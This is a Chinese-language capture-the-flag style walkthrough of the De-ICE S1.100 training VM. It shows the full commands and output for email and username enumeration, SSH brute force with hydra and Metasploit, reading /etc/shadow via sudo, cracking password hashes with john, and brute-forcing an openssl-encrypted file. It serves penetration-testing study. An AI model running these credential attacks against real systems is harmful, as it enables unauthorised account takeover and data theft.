Walkthroughs about De-ICE_S1.100
推荐观看站点
https://pur3h4t3.blogspot.com/2007/12/de-ice-pentest-disc-1100.html
https://blog.techorganic.com/2011/07/19/de-ice-hacking-challenge-part-1/
http://blog.nullmode.com/blog/2013/11/01/de-ice-s1-dot-100-level-1-a-beginners-guide/
https://www.taringa.net/+linux/hacking-challenge-de-ice-s1-100-parte-1_ss48t
前期已经使用nmap全端口扫描了,限制使用dirb进行目录猜解
dirb http://10.57.31.34 -w /usr/share/dirb/wordlists/common.txt
使用gobuster进行目录猜解,多尝试几个工具
gobuster dir -u http://10.57.31.34 -w /usr/share/wordlists/dirb/big.txt
最终没有得到想要的结果,只得出了如下几个URL
index.php, index2.php, level.php, copyright.txt
通过查看level.php的源代码发现提示如下
nmap ,Firefox, hydra, john, openssl
看提示,估计是要使用暴力破解工具进行测试
尝试如下操作:
curl http://10.57.31.34/copyright.txt |grep @
EMAIL: pentestlab@De-ICE.net (preferred)
twilhelm@herot.net
twilhelm@heorot.net (business only)
we can find the site email information and use this brute force
curl http://10.57.31.34/index2.php |grep @
Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)<BR>
Employee Pay: Pat Patrick - patrickp@herot.net<BR>
Travel Comp: Terry Thompson - thompsont@herot.net<BR>
Benefits: Ben Benedict - benedictb@herot.net<BR>
Director of Engineering: Erin Gennieg - genniege@herot.net<BR>
Project Manager: Paul Michael - michaelp@herot.net<BR>
Engineer Lead: Ester Long - longe@herot.net<BR>
Sr. System Admin: Adam Adams - adamsa@herot.net<BR>
System Admin (Intern): Bob Banter - banterb@herot.net<BR>
System Admin: Chad Coffee - coffeec@herot.net<BR>
尝试获取邮件名称
cewl http://10.57.31.34/index2.php -e -n -w email1.txt
根据站点页面信息生成字典
cewl http://10.57.31.34/index2.php -w de_index2_ok_dic.txt
其他方式生成字典工具crunch
生成最小长度为3 最大长度为4切字典中含有1234其中的数字
crunch 3 4 1234 > num.txt
最终结果
twilhelm@herot.net
twilhelm@heorot.net
patrickp@herot.net
marym@herot.net
patrickp@herot.net
thompsont@herot.net
benedictb@herot.net
genniege@herot.net
michaelp@herot.net
longe@herot.net
adamsa@herot.net
banterb@herot.net
coffeec@herot.net
- 使用工具smtp-user-enum枚举站点上的email
smtp-user-enum -M VRFY -U /root/Documents/de_ice_s1.100/dictionary/gather_mail/email.txt -t 10.57.31.34
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /root/Documents/de_ice_s1.100/dictionary/gather_mail/email.txt
Target count ............. 1
Username count ........... 14
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Tue Nov 12 13:30:43 2019 #########
10.57.31.34: banterb@herot.net exists
10.57.31.34: genniege@herot.net exists
10.57.31.34: adamsa@herot.net exists
10.57.31.34: coffeec@herot.net exists
10.57.31.34: benedictb@herot.net exists
10.57.31.34: longe@herot.net exists
10.57.31.34: michaelp@herot.net exists
10.57.31.34: marym@herot.net exists
10.57.31.34: patrickp@herot.net exists
10.57.31.34: thompsont@herot.net exists
10.57.31.34: pentestlab@De-ICE.net exists
10.57.31.34: Email addresses found exists
10.57.31.34: twilhelm@heorot.net exists
10.57.31.34: twilhelm@herot.net exists
######## Scan completed at Tue Nov 12 13:30:48 2019 #########
14 results.
过滤邮件用户
awk -F@ '{ print $1 }' email.txt > emailuser.txt
尝试搜集真实用户姓名,然后根据真实用户的姓名生成可能存在的用户名
Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr. System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net
curl http://10.57.31.34/index2.php | grep -E -o "\b[a-zA-Z0-9.-]+@\b" | cut -d "@" -f1 > usernames.txt
直接通过上述命令过滤出用户名
另一种方法过滤取的用户名
awk -F: '{print
1}' > okusername.txt
根据网站生成的姓名如下:
Marie Mary
Pat Patrick
Terry Thompson
Ben Benedict
Erin Gennieg
Paul Michael
Ester Long
Adam Adams
Bob Banter
Chad Coffee
- 根据上述生成的姓名用户Python脚本生成可能存在的用户名
- https://gist.github.com/superkojiman/11076951
- python namemash.py okusername.py
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) != 2:
print "usage: %s names.txt" % (sys.argv[0])
sys.exit(0)
for line in open(sys.argv[1]):
name = ''.join([c for c in line if c == " " or c.isalpha()])
tokens = name.lower().split()
fname = tokens[0]
lname = tokens[-1]
print fname + lname # johndoe
print lname + fname # doejohn
print fname + "." + lname # john.doe
print lname + "." + fname # doe.john
print lname + fname[0] # doej
print fname[0] + lname # jdoe
print lname[0] + fname # djoe
print fname[0] + "." + lname # j.doe
print lname[0] + "." + fname # d.john
print fname # john
print lname # joe
- 这个脚本有110个用户名,可根据实际情况再筛检一下用户名
- python namemash.py okusername.txt > finalokusername.txt
mariemary
marymarie
marie.mary
mary.marie
marym
mmary
mmarie
m.mary
m.marie
marie
mary
patpatrick
patrickpat
pat.patrick
patrick.pat
patrickp
ppatrick
ppat
p.patrick
p.pat
pat
patrick
terrythompson
thompsonterry
terry.thompson
thompson.terry
thompsont
tthompson
tterry
t.thompson
t.terry
terry
thompson
benbenedict
benedictben
ben.benedict
benedict.ben
benedictb
bbenedict
bben
b.benedict
b.ben
ben
benedict
eringennieg
genniegerin
erin.gennieg
gennieg.erin
genniege
egennieg
gerin
e.gennieg
g.erin
erin
gennieg
paulmichael
michaelpaul
paul.michael
michael.paul
michaelp
pmichael
mpaul
p.michael
m.paul
paul
michael
esterlong
longester
ester.long
long.ester
longe
elong
lester
e.long
l.ester
ester
long
adamadams
adamsadam
adam.adams
adams.adam
adamsa
aadams
aadam
a.adams
a.adam
adam
adams
bobbanter
banterbob
bob.banter
banter.bob
banterb
bbanter
bbob
b.banter
b.bob
bob
banter
chadcoffee
coffeechad
chad.coffee
coffee.chad
coffeec
ccoffee
cchad
c.coffee
c.chad
chad
coffee
这里有个小技巧,可以通过分析目标系统,发现目标站点给出的信息中有描述系统管理员,高级系统管理员对应的姓名和邮件地址,根据这两个系统管理员的用户进行尝试组合可能存在的用户名然后进行暴力破解
开始暴力破解,使用多种方式破解
hydra -L emailuser.txt -P index2dict_6.txt ssh://10.57.31.34
hydra -L emailuser.txt -P index2dict_6.txt 10.57.31.34 ssh
medusa -h 10.57.31.34 -U emailuser.txt -P index2dict_6.txt -M ssh
ncrack -v -U emailuser.txt -P de_index2_ok_dic.txt 10.57.31.34:22
========================================================================
使用msf进行ssh暴力破解
use auxiliary/scanner/ssh/ssh_login
set user_file /root/Documents/de_ice_s1.100/dictionary/emailuser.txt
set pass_file /root/Documents/de_ice_s1.100/dictionary/de_index2_ok_dic.txt
exploit
最终根据系统管理员的用户生成一组用户名进行尝试用户名和密码都一样的尝试测试,使用hydra进行爆破,发现很快就破解出来了bbanter的账户和密码
hydra -L emailuser.txt -P emailuser.txt 10.57.31.34 ssh
hydra -L emailuser.txt -P emailuser.txt 10.57.31.34 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-12 19:27:18
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 330 login tries (l:3/p:110), ~21 tries per task
[DATA] attacking ssh://10.57.31.34:22/
[22][ssh] host: 10.57.31.34 login: bbanter password: bbanter
[STATUS] 236.00 tries/min, 236 tries in 00:01h, 105 to do in 00:01h, 16 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-11-12 19:29:08
- 发现用户名:bbanter 密码也是:bbanter
- 使用这个用户名和密码等目标系统,然后查看是否含有其他账户和账户对应的权限
- cat /etc/passwd
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
- cat /etc/group
bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
- 通过执行上述两条命令发现 aadams账户的 GID=10 含有root权限,可推测出其权限更高; aadams:gid=10-->wheel:gid=10:root
aadams:x:1000:10:,,,:/home/aadams:/bin/bash #gid=10
wheel::10:root #gid=10
所以直接使用密码字典对应用户aadams进行暴力破解
hydra -l aadams -P /usr/share/wordlists/rockyou.txt 10.57.31.34 ssh
hydra -l aadams -P /usr/share/wordlists/rockyou.txt -e nsr -u -t 128 10.57.31.34 ssh
-u 对密码字典进行排序,让破解速度更快
-e nsr
n 测试是否存在空密码
s 测试是否和用户一样的密码
r 反向测试,尝试用户名是密码字典,密码是用户名
差不多使用hydra跑了一个下午
hydra -l aadams -P /usr/share/wordlists/rockyou.txt 10.57.31.34 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-12 14:57:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.57.31.34:22/
[STATUS] 209.00 tries/min, 209 tries in 00:01h, 14344191 to do in 1143:53h, 16 active
[STATUS] 191.67 tries/min, 575 tries in 00:03h, 14343825 to do in 1247:18h, 16 active
[STATUS] 178.29 tries/min, 1248 tries in 00:07h, 14343152 to do in 1340:51h, 16 active
[STATUS] 175.60 tries/min, 2634 tries in 00:15h, 14341766 to do in 1361:13h, 16 active
[STATUS] 175.94 tries/min, 5454 tries in 00:31h, 14338946 to do in 1358:22h, 16 active
[STATUS] 175.51 tries/min, 8249 tries in 00:47h, 14336151 to do in 1361:23h, 16 active
[STATUS] 175.22 tries/min, 11039 tries in 01:03h, 14333361 to do in 1363:22h, 16 active
[STATUS] 175.28 tries/min, 13847 tries in 01:19h, 14330553 to do in 1362:39h, 16 active
[STATUS] 175.19 tries/min, 16643 tries in 01:35h, 14327757 to do in 1363:05h, 16 active
[STATUS] 175.19 tries/min, 19446 tries in 01:51h, 14324954 to do in 1362:49h, 16 active
[STATUS] 174.96 tries/min, 22220 tries in 02:07h, 14322180 to do in 1364:20h, 16 active
[STATUS] 175.04 tries/min, 25031 tries in 02:23h, 14319369 to do in 1363:26h, 16 active
[STATUS] 175.09 tries/min, 27840 tries in 02:39h, 14316560 to do in 1362:45h, 16 active
[STATUS] 175.13 tries/min, 30647 tries in 02:55h, 14313753 to do in 1362:15h, 16 active
[STATUS] 175.28 tries/min, 33479 tries in 03:11h, 14310921 to do in 1360:45h, 16 active
[22][ssh] host: 10.57.31.34 login: aadams password: nostradamus
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-11-12 18:14:56
- 终于把密码跑出来了 username:aadams passowrd:nostradamus
[22][ssh] host: 10.57.31.34 login: aadams password: nostradamus
- 使用username:aadams passowrd:nostradamus 登录目标主机
- 执行sudo -l
aadams@slax:~$ sudo -l
Password:
User aadams may run the following commands on this host:
(root) NOEXEC: /bin/ls
(root) NOEXEC: /usr/bin/cat
(root) NOEXEC: /usr/bin/more
(root) NOEXEC: !/usr/bin/su *root*
- 发现aadams含有sudo 执行cat的权限
- 执行sudo cat /etc/shadow
aadams@slax:~$ sudo cat /etc/shadow
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
aadams@slax:~$
* 尝试查看家目录的所有文件和目录,包括隐藏文件,并且显示大小,排序
ls -lsaRhS /home/
执行 sudo cat /etc/passwd
aadams@slax:~$ sudo cat /etc/passwd
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash
- 开始使用john 暴力破解root和其他用户
- unshadow slaxpasswd.txt slaxshadow.txt > finalshadow.txt
- john --wordlist=/usr/share/wordlists/rockyou.txt finalshadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt finalshadow.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nostradamus (aadams)
tarot (root)
hierophant (ccoffee)
3g 0:00:00:45 DONE (2019-11-12 19:47) 0.06607g/s 310573p/s 355275c/s 355275C/s !!!0mc3t..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john --show finalshadow.txt
root:tarot:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
aadams:nostradamus:1000:10:,,,:/home/aadams:/bin/bash
ccoffee:hierophant:1002:100:,,,:/home/ccoffee:/bin/bash
3 password hashes cracked, 1 left
发现如下密码
root:tarot
aadams:nostradamus
ccoffee:hierophant
使用root登录目标主机发现如下信息
find /home/ftp/incoming/ have salary_dec2003.csv.enc
尝试查看此文件的类型
file salary_dec2003.csv.enc
发现是数据类型没有什么作用
现在需要解密这个文件,但是不知道是用什么加密方式和对应密码
通过观察发现 cat /etc/passwd faxian tishi "DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION"
root's tarot
可以通过脚本遍历加密文件是使用的哪种加密算法
openssl list-cipher-commands 此命令是列出所有的加密方式
root@slax:/home/ftp/incoming# openssl list-cipher-commands
aes-128-cbc
aes-128-ecb
aes-192-cbc
aes-192-ecb
aes-256-cbc
aes-256-ecb
base64
bf
bf-cbc
bf-cfb
bf-ecb
bf-ofb
cast
cast-cbc
cast5-cbc
cast5-cfb
cast5-ecb
cast5-ofb
des
des-cbc
des-cfb
des-ecb
des-ede
des-ede-cbc
des-ede-cfb
des-ede-ofb
des-ede3
des-ede3-cbc
des-ede3-cfb
des-ede3-ofb
des-ofb
des3
desx
rc2
rc2-40-cbc
rc2-64-cbc
rc2-cbc
rc2-cfb
rc2-ecb
rc2-ofb
rc4
rc4-40
root@slax:/home/ftp/incoming# openssl list-cipher-commands | wc -l
42
- 尝试写如下脚本
- vi decryptslaxfile.sh
#!/bin/bash
ciphers=`openssl list-cipher-commands`
for i in $ciphers; do
openssl enc -d -${i} -in salary_dec2003.csv.enc -k tarot > /dev/null 2>&1
if [[ $? -eq 0 ]]; then
echo "Cipher is $i: openssl enc -d -${i} -in salary_dec2003.csv.enc -k tarot -out resultdecryptfile.csv"
exit
fi
done
- or
#!/bin/bash
# Usage:
if [[ -z $1 ]]; then
echo 'USAGE: ./brutedecypt.sh <input file> <output file> <password> [cipher]'
fi
# Arrange variables
INPUTFILE=$1
OUTPUTFILE=$2
PASSWORD=$3
CIPHER=$4
# If a specific cipher is not given then
# get list of ciphers using by openssl
if [[ -z $CIPHER ]]; then
CIPHER=`openssl list-cipher-commands`
fi
#echo $CIPHER
# For each cipher type run the following command for each password
# (unless specific password given)
for c in $CIPHER; do
openssl enc -d -${c} -in ${INPUTFILE} -k ${PASSWORD} > /dev/null 2>&1
# Check to see if the command didn't fail the decryption
# If it didn't alert user
if [[ $? -eq 0 ]]; then
# Display commands of possible decryption methods
# Appends the cipher ont he end of the output file so more than one commands
# Can be run at the same time
echo "openssl enc -d -$c -in $INPUTFILE -out $OUTPUTFILE-$c -k $PASSWORD"
#exit 0
fi
done
./brutedecrypt.sh salary_dec2003.csv.enc results/salary_dec2003.csv tarot
输出结果如下 :
Cipher is aes-128-cbc: openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -k tarot -out resultdecryptfile.csv
尝试解密 salary_dec2003.csv.enc
openssl enc -d -v -aes-128-cbc -in salary_dec2003.csv.enc -k tarot -out resultdecryptfile.csv
查看解密结果
head resultdecryptfile.csv or strings resultdecryptfile.csv
确认ftp服务是否正常可以使用下面这个命令查找文件测试
find /etc -name ftp -type f
root@slax:~# find /etc -name *ftp* -type f
/etc/rc.d/rc.vsftpd
/etc/logrotate.d/vsftpd
/etc/vsftpd.conf
- 免责申明:本人所撰写的文章,仅供学习和研究使用,请勿使用文中的技术或源码用于非法用途,任何人造成的任何负面影响,或触犯法律,与本人无关
